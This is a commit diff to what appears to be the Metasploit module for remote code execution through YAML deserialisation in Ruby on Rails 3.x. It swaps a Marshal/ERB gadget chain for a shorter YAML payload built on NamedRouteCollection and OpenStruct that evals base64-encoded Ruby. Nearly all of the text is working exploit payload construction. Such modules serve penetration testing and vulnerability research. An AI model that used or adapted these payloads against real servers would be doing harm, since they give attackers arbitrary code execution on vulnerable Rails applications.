This works against a wider range of RoR 3.x targets

Author: HD Moore

modules/exploits/multi/http/rails_xml_yaml_code_exec.rb

@@ -84,36 +84,11 @@ def detached_payload_stub(code)
 	def build_yaml
 
 		# Embed the payload with the detached stub
-		code =
-			"eval('" +
-			Rex::Text.encode_base64(detached_payload_stub(payload.encoded)) +
-			"'.unpack('m0').first)"
-
-		# Create a base64-encoded marshalled object
-		inner_payload = Rex::Text.encode_base64(
-			"\x04\x08" +
-			"o"+":\x40ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy"+"\x07" +
-				":\x0E@instance" +
-					"o"+":\x08ERB"+"\x06" +
-						":\x09@src" +
-							Marshal.dump(code)[2..-1] +
-				":\x0C@method"+":\x0Bresult"
-		)
-
-		# Pack this into a YAML (the leading whitespace below is important)
-		payload = <<-PAYLOAD.strip.gsub("\n", "&#10;")
---- !ruby/object:Gem::Requirement
-  requirements:
-  - !ruby/object:Rack::Session::Abstract::SessionHash
-    env:
-      HTTP_COOKIE: a=#{inner_payload}
-    by: !ruby/object:Rack::Session::Cookie
-      coder: !ruby/object:Rack::Session::Cookie::Base64::Marshal {}
-      key: a
-      secrets: []
-    exists: true
-PAYLOAD
-
+		code = Rex::Text.encode_base64( detached_payload_stub(payload.encoded) )
+		yaml =
+			"--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n" +
+			"'; (eval(%[#{code}].unpack(%[m0])[0]); @e=true) unless @e #':" +
+			" !ruby/object:OpenStruct\n table:\n  :defaults: {}\n"
 	end